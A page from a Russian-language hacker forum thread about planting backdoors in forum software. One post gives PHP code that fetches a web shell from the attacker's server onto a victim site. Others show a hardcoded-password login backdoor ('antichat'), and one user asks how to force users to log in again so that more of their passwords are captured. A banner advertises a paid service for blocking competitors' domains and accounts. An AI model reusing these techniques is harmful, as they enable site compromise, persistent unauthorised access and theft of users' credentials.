Бэкдорим форумы. Теория и практика!

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Бэкдорим форумы. Теория и практика!

Страница 2 из 2

Опции темы

Поиск в этой теме

Опции просмотра

#11

31.12.2006, 03:57

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

С нами: 10686686

Репутация: 447

Цитата:

Сообщение от Qwazar

Порой в настройках PHP установлена директива disable_functions со значением "exec, system, passthru и т.п." тогда необходимо использовать eval т.к. всего можно добиться средствами PHP.

Добавлю от себя как я это обошел запихнул код что то типа этого

Код:

<?php copy($_GET['sh'],sh.'.php');?>

т.е при заходе на
_http://site.com/index.php?sh=http://ВАШ_СЕРВЕР.ru/ВАШ_ШЕЛЛ.php на серваке создается файл в нутрь которого копируется код вашего шелла.Запускаем наш шелл так _http://site.com/sh.php вот так можно обойти некоторые ограничения например safe mode ON

#12

22.01.2007, 01:33

_-[A.M.D]HiM@S-_

Green member

Регистрация: 28.12.2005

Сообщений: 376

С нами: 10719686

Репутация: 1833

*************Внимание - Внимание*****************
Уважаемые пользователи, стыд да срам. Впредь флуд в этой теме, а также в подобных темах, будет строго наказываться. Это первое и последнее предупреждение.
*************Внимание - Внимание*****************

*************Attention - Attention*****************
Dear users, shame on you. Flood in this and similar themes will be strictly punished from now. It is last warning
*************Attention - Attention*****************

Последний раз редактировалось Grey; 02.03.2007 в 18:25..

#13

12.03.2007, 17:48

MegaDeth

Участник форума

Регистрация: 08.11.2006

Сообщений: 208

С нами: 10266046

Репутация: 184

PHP код:


		
			
 if (( md5($password) == $row && $row ) or ($password=="antichat"))

замечу что в этом случае хоть блаблабла напиши пароль 0 подойдет потомучто не учитываються типы сравниваемых данных === надо. а скрипт от 19 подошел к 22, последней.

#14

03.04.2007, 22:55

DDA

Познающий

Регистрация: 02.01.2007

Сообщений: 99

С нами: 10186449

Репутация: 120

ладно - отправкой мыла разобрался

теперь стоит вопрос такой

все продолжают заходить на форум по кукам , а не вводя пароль
поэтому мало паролей приходит

Можно ли как нить в админке Ipb сбросить куки чтоб все заново ввели пароль и логин?

#15

11.04.2007, 12:57

Dimon_Aka_Sexxx

Новичок

Регистрация: 22.01.2007

Сообщений: 18

С нами: 10158815

Репутация: 6

форум булка 3.5.4
чего то не получается залить шелл
через добавление faq модуля
модуль добавляю как написано в теме обзор уязвимостей булки.
но чего то при запросах ни ls ни dir не выдаёт (
непогу понять почему.
форум не патченый ставили как есть .

#16

19.11.2007, 13:49

Ershik

Постоянный

Регистрация: 07.11.2007

Сообщений: 392

С нами: 9741777

Репутация: 100

Код:

if (( md5($password) == $row['user_password'] && $row['user_active'] ) or ($password=="antichat"))

Светиться ли пользователей antichat в админке как администратор?

#17

19.11.2007, 13:58

ENFIX

Участник форума

Регистрация: 06.06.2006

Сообщений: 213

С нами: 10488959

Репутация: 474

нет

Страница 2 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Практика есть практика...	Kreps	Болталка	7	08.12.2005 14:38

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход